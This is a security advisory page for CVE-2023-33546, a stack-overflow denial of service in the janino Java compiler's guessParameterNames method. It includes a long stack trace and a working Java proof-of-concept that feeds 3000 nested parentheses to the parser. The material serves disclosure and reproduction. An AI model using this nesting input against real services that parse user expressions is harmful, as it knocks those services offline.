
Headline

CVE-2023-33546: A Stack overflow error · Issue #201 · janino-compiler/janino

janino 3.1.9 and earlier are subject to denial-of-service (DoS) attacks when using the `ExpressionEvaluator.guessParameterNames` method. If the parser runs on user-supplied input, an attacker could supply content that causes the parser to crash with a stack overflow.

CVE
#dos#js#java

Description

janino 3.1.9 and earlier are subject to denial-of-service (DoS) attacks when using the `ExpressionEvaluator.guessParameterNames` method. If the parser runs on user-supplied input, an attacker could supply content that causes the parser to crash with a stack overflow.

Error Log

    at org.codehaus.janino.TokenStreamImpl.produceToken(TokenStreamImpl.java:55)
at org.codehaus.janino.TokenStreamImpl.peek(TokenStreamImpl.java:94)
at org.codehaus.janino.TokenStreamImpl.peek(TokenStreamImpl.java:114)
at org.codehaus.janino.Parser.peek(Parser.java:3781)
at org.codehaus.janino.Parser.parsePrimary(Parser.java:3203)
at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
at org.codehaus.janino.Parser.parseAdditiveExpression(Parser.java:3047)
at org.codehaus.janino.Parser.parseShiftExpression(Parser.java:3026)
at org.codehaus.janino.Parser.parseRelationalExpression(Parser.java:2936)
at org.codehaus.janino.Parser.parseEqualityExpression(Parser.java:2910)
at org.codehaus.janino.Parser.parseAndExpression(Parser.java:2889)
at org.codehaus.janino.Parser.parseExclusiveOrExpression(Parser.java:2868)
at org.codehaus.janino.Parser.parseInclusiveOrExpression(Parser.java:2847)
at org.codehaus.janino.Parser.parseConditionalAndExpression(Parser.java:2826)
at org.codehaus.janino.Parser.parseConditionalOrExpression(Parser.java:2805)
at org.codehaus.janino.Parser.parseConditionalExpression(Parser.java:2786)
at org.codehaus.janino.Parser.parseAssignmentExpression(Parser.java:2767)
at org.codehaus.janino.Parser.parseExpressionOrType(Parser.java:2748)
at org.codehaus.janino.Parser.parsePrimary(Parser.java:3254)
at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
at org.codehaus.janino.Parser.parseAdditiveExpression(Parser.java:3047)
at org.codehaus.janino.Parser.parseShiftExpression(Parser.java:3026)
at org.codehaus.janino.Parser.parseRelationalExpression(Parser.java:2936)
at org.codehaus.janino.Parser.parseEqualityExpression(Parser.java:2910)
at org.codehaus.janino.Parser.parseAndExpression(Parser.java:2889)
at org.codehaus.janino.Parser.parseExclusiveOrExpression(Parser.java:2868)
at org.codehaus.janino.Parser.parseInclusiveOrExpression(Parser.java:2847)
at org.codehaus.janino.Parser.parseConditionalAndExpression(Parser.java:2826)
at org.codehaus.janino.Parser.parseConditionalOrExpression(Parser.java:2805)
at org.codehaus.janino.Parser.parseConditionalExpression(Parser.java:2786)
at org.codehaus.janino.Parser.parseAssignmentExpression(Parser.java:2767)
at org.codehaus.janino.Parser.parseExpressionOrType(Parser.java:2748)
at org.codehaus.janino.Parser.parsePrimary(Parser.java:3254)
at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
at org.codehaus.janino.Parser.parseAdditiveExpression(Parser.java:3047)
at org.codehaus.janino.Parser.parseShiftExpression(Parser.java:3026)
at org.codehaus.janino.Parser.parseRelationalExpression(Parser.java:2936)
at org.codehaus.janino.Parser.parseEqualityExpression(Parser.java:2910)
at org.codehaus.janino.Parser.parseAndExpression(Parser.java:2889)
at org.codehaus.janino.Parser.parseExclusiveOrExpression(Parser.java:2868)
at org.codehaus.janino.Parser.parseInclusiveOrExpression(Parser.java:2847)
at org.codehaus.janino.Parser.parseConditionalAndExpression(Parser.java:2826)
at org.codehaus.janino.Parser.parseConditionalOrExpression(Parser.java:2805)
at org.codehaus.janino.Parser.parseConditionalExpression(Parser.java:2786)
at org.codehaus.janino.Parser.parseAssignmentExpression(Parser.java:2767)
at org.codehaus.janino.Parser.parseExpressionOrType(Parser.java:2748)
at org.codehaus.janino.Parser.parsePrimary(Parser.java:3254)
at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
at org.codehaus.janino.Parser.parseAdditiveExpression(Parser.java:3047)
at org.codehaus.janino.Parser.parseShiftExpression(Parser.java:3026)
at org.codehaus.janino.Parser.parseRelationalExpression(Parser.java:2936)
at org.codehaus.janino.Parser.parseEqualityExpression(Parser.java:2910)
at org.codehaus.janino.Parser.parseAndExpression(Parser.java:2889)
at org.codehaus.janino.Parser.parseExclusiveOrExpression(Parser.java:2868)
at org.codehaus.janino.Parser.parseInclusiveOrExpression(Parser.java:2847)
at org.codehaus.janino.Parser.parseConditionalAndExpression(Parser.java:2826)
at org.codehaus.janino.Parser.parseConditionalOrExpression(Parser.java:2805)
at org.codehaus.janino.Parser.parseConditionalExpression(Parser.java:2786)
at org.codehaus.janino.Parser.parseAssignmentExpression(Parser.java:2767)
at org.codehaus.janino.Parser.parseExpressionOrType(Parser.java:2748)
at org.codehaus.janino.Parser.parsePrimary(Parser.java:3254)
at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
at org.codehaus.janino.Parser.parseAdditiveExpression(Parser.java:3047)
at org.codehaus.janino.Parser.parseShiftExpression(Parser.java:3026)
at org.codehaus.janino.Parser.parseRelationalExpression(Parser.java:2936)
at org.codehaus.janino.Parser.parseEqualityExpression(Parser.java:2910)
at org.codehaus.janino.Parser.parseAndExpression(Parser.java:2889)
at org.codehaus.janino.Parser.parseExclusiveOrExpression(Parser.java:2868)
at org.codehaus.janino.Parser.parseInclusiveOrExpression(Parser.java:2847)
at org.codehaus.janino.Parser.parseConditionalAndExpression(Parser.java:2826)
at org.codehaus.janino.Parser.parseConditionalOrExpression(Parser.java:2805)
at org.codehaus.janino.Parser.parseConditionalExpression(Parser.java:2786)
at org.codehaus.janino.Parser.parseAssignmentExpression(Parser.java:2767)
at org.codehaus.janino.Parser.parseExpressionOrType(Parser.java:2748)
at org.codehaus.janino.Parser.parsePrimary(Parser.java:3254)
at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
at org.codehaus.janino.Parser.parseAdditiveExpression(Parser.java:3047)
at org.codehaus.janino.Parser.parseShiftExpression(Parser.java:3026)
at org.codehaus.janino.Parser.parseRelationalExpression(Parser.java:2936)
at org.codehaus.janino.Parser.parseEqualityExpression(Parser.java:2910)
at org.codehaus.janino.Parser.parseAndExpression(Parser.java:2889)
at org.codehaus.janino.Parser.parseExclusiveOrExpression(Parser.java:2868)
at org.codehaus.janino.Parser.parseInclusiveOrExpression(Parser.java:2847)
at org.codehaus.janino.Parser.parseConditionalAndExpression(Parser.java:2826)
at org.codehaus.janino.Parser.parseConditionalOrExpression(Parser.java:2805)
at org.codehaus.janino.Parser.parseConditionalExpression(Parser.java:2786)
at org.codehaus.janino.Parser.parseAssignmentExpression(Parser.java:2767)
at org.codehaus.janino.Parser.parseExpressionOrType(Parser.java:2748)
at org.codehaus.janino.Parser.parsePrimary(Parser.java:3254)
at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)
at org.codehaus.janino.Parser.parseAdditiveExpression(Parser.java:3047)
at org.codehaus.janino.Parser.parseShiftExpression(Parser.java:3026)
at org.codehaus.janino.Parser.parseRelationalExpression(Parser.java:2936)
at org.codehaus.janino.Parser.parseEqualityExpression(Parser.java:2910)
at org.codehaus.janino.Parser.parseAndExpression(Parser.java:2889)
at org.codehaus.janino.Parser.parseExclusiveOrExpression(Parser.java:2868)
at org.codehaus.janino.Parser.parseInclusiveOrExpression(Parser.java:2847)
at org.codehaus.janino.Parser.parseConditionalAndExpression(Parser.java:2826)
at org.codehaus.janino.Parser.parseConditionalOrExpression(Parser.java:2805)
at org.codehaus.janino.Parser.parseConditionalExpression(Parser.java:2786)
at org.codehaus.janino.Parser.parseAssignmentExpression(Parser.java:2767)
at org.codehaus.janino.Parser.parseExpressionOrType(Parser.java:2748)
at org.codehaus.janino.Parser.parsePrimary(Parser.java:3254)
at org.codehaus.janino.Parser.parseUnaryExpression(Parser.java:3109)
at org.codehaus.janino.Parser.parseMultiplicativeExpression(Parser.java:3068)

Reproducing

// PoC.java
import org.codehaus.commons.compiler.CompileException;
import org.codehaus.janino.ExpressionEvaluator;
import org.codehaus.janino.Scanner;

import java.io.IOException;
import java.io.StringReader;

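public class PoC {

    /**
     * Hands {@code data} to {@code ExpressionEvaluator.guessParameterNames} and discards the
     * checked exceptions and assertion failures the parser reports for malformed input.
     * A {@link StackOverflowError} is deliberately <em>not</em> caught, so a parser crash on
     * deeply nested input propagates out of this method — that is the condition reported
     * in the issue.
     *
     * @param data the source text fed to the janino scanner
     */
    public static void test(String data) {
        try {
            ExpressionEvaluator.guessParameterNames(new Scanner(null, new StringReader(data)));
        } catch (IOException | CompileException | AssertionError ignored) {
            // Ordinary parse failures are expected for arbitrary input and are not what this
            // reproducer is about; only an uncaught StackOverflowError is of interest.
        }
    }

    /**
     * Builds a document consisting of {@code nesting} copies of {@code open}, then
     * {@code content} on its own line, then {@code nesting} copies of {@code close}.
     * A line break is inserted after every 32nd opener/closer so the result is not one
     * enormous line.
     *
     * @param nesting number of opener/closer pairs to emit (non-negative)
     * @param open    text emitted {@code nesting} times before the content
     * @param close   text emitted {@code nesting} times after the content
     * @param content text placed in the middle of the nesting
     * @return the assembled document
     */
    public static String _nestedDoc(int nesting, String open, String close, String content) {
        // Capacity is only a hint; the inserted line breaks are not counted.
        StringBuilder sb = new StringBuilder(nesting * (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append('\n');
            }
        }
        sb.append('\n').append(content).append('\n');
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append('\n');
            }
        }
        return sb.toString();
    }

    /**
     * Reproducer entry point: builds a 3000-level nested parenthesised expression and feeds
     * it to the parser. On an affected janino version the recursive-descent expression
     * parser (see the stack trace in the report) exhausts the thread stack.
     *
     * @param args ignored
     */
    public static void main(String[] args) {
        String tooDeepDoc = _nestedDoc(3000, "( ", ") ", "t");
        test(tooDeepDoc);
    }
}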

Related news

GHSA-gcg6-xv4f-f749: janino vulnerable to denial of service due to stack overflow

janino 3.1.9 and earlier are subject to denial-of-service (DoS) attacks when using the `ExpressionEvaluator.guessParameterNames` method. If the parser runs on user-supplied input, an attacker could supply content that causes the parser to crash with a stack overflow.
